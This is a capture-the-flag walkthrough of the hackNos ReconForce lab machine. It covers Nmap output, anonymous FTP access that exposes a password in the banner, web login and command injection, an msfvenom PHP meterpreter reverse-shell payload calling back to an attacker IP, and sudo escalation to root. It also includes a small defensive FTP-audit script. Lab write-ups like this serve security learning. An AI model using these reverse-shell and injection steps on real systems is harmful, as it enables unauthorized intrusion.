hackNos: ReconForce Walkthrough

Nmap-

Nmap scan report for 192.168.56.106
Host is up, received arp-response (0.0012s latency).
Scanned at 2020-02-17 13:51:07 India Standard Time for 26s
Not shown: 997 closed ports
Reason: 997 resets
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:192.168.56.1
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 6f:96:94:65:72:80:08:93:23:90:20:bc:76:df:b8:ec (RSA)
|   256 6f:bb:49:1a:a9:b6:e5:00:84:19:a0:e4:2b:c4:57:c4 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFjhaMef9pyq2VUWLEn55nxXKJuNPyAxoh2pSygawGh8ozI/+Rbv9QOwNMuNRpaoEbl0UQRI2eekXg0f2r16JPw=
|   256 ce:3d:94:05:f4:a6:82:c4:7f:3f:ba:37:1d:f6:23:b0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBojzCf/3K/qMpLEcKJ+8tok41HScNSx3vE3GZqb/UDy
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Recon_Web
MAC Address: 08:00:27:C1:56:8B (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Uptime guess: 46.991 days (since Wed Jan 01 14:04:49 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.23 ms 192.168.56.106

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:51
Completed NSE at 13:51, 0.01s elapsed
Read data files from: C:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.97 seconds
           Raw packets sent: 1111 (52.918KB) | Rcvd: 1072 (46.330KB)

Access the FTP service with anonymous login- (found "Security@hackNos" in the FTP banner)

ftp 192.168.56.106
Connected to 192.168.56.106.
220 "Security@hackNos".
200 Always in UTF8 mode.
User (192.168.56.106:(none)): anonymous
331 Please specify the password.
Password:
230 Login successful.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> lsit
Invalid command.
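Added example (my own code, not part of the original post): a small defender-side audit of the FTP exposure shown above. It takes the Nmap lines and the FTP greeting as constructed sample input and flags anonymous login, a plaintext control channel, and a banner carrying a credential-like token; the regex heuristic and the function names are my own assumptions.

```python
import re

# Constructed sample input: the relevant lines of the walkthrough's Nmap
# output for 192.168.56.106 and the FTP greeting seen in the ftp session.
SAMPLE_NMAP = """\
21/tcp open  ftp     syn-ack ttl 64 vsftpd 2.0.8 or later
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
|      Control connection is plain text
|      Data connections will be plain text
"""
SAMPLE_BANNER = '220 "Security@hackNos".'

# Heuristic (my own): a whitespace-free token with upper and lower case letters
# around a password-style symbol has the shape of a policy-compliant password
# and should never appear in a service greeting.
CRED_TOKEN = re.compile(r'(?=\S*[A-Z])(?=\S*[a-z])\S*[@#$%!&*]\S*')


def extract_banner_text(banner_line):
    """Return the greeting text of a '220 ...' FTP reply, quotes stripped."""
    m = re.match(r'^220[ -](.*)$', banner_line.strip())
    if not m:
        return ""
    return m.group(1).strip().rstrip(".").strip('"')


def audit_ftp(nmap_text, banner_line):
    """Return the findings for an FTP service from its Nmap lines and greeting."""
    findings = []
    if re.search(r'ftp-anon: Anonymous FTP login allowed', nmap_text):
        findings.append("anonymous-login-allowed")
    if "Control connection is plain text" in nmap_text:
        findings.append("plaintext-control-channel")
    text = extract_banner_text(banner_line)
    if text and CRED_TOKEN.search(text):
        findings.append("credential-like-banner")
    return findings


if __name__ == "__main__":
    for finding in audit_ftp(SAMPLE_NMAP, SAMPLE_BANNER):
        print(finding)
```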

Access port 80-
Logging in with some default credentials (e.g. admin/admin, admin/password) gives an Unauthorized error-


Tried logging in with the default admin user and the Security@hackNos password found above-


Login Successful- (Command Injection)

Creating PHP Shell with msfvenom- 
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.103 lport=4444 -f raw

Saved this file as shell1.php

Running Python Server-
python -m SimpleHTTPServer 8000


Downloading this shell1.php file (as hosted above)-



The file is uploaded on the server; now access this shell1.php file to get the reverse shell.

Getting reverse Shell-

Python TTY Shell-



user.txt file access-
recon user details- (tried logging in as the user "recon" with the found password "Security@hacknos", as this name is used on the website many times).
recon:x:1000:119:rahul:/home/recon:/bin/bash

Privilege Escalation-
(checked whether the user recon has a sudoers entry, so let's sudo su)

Thanks..
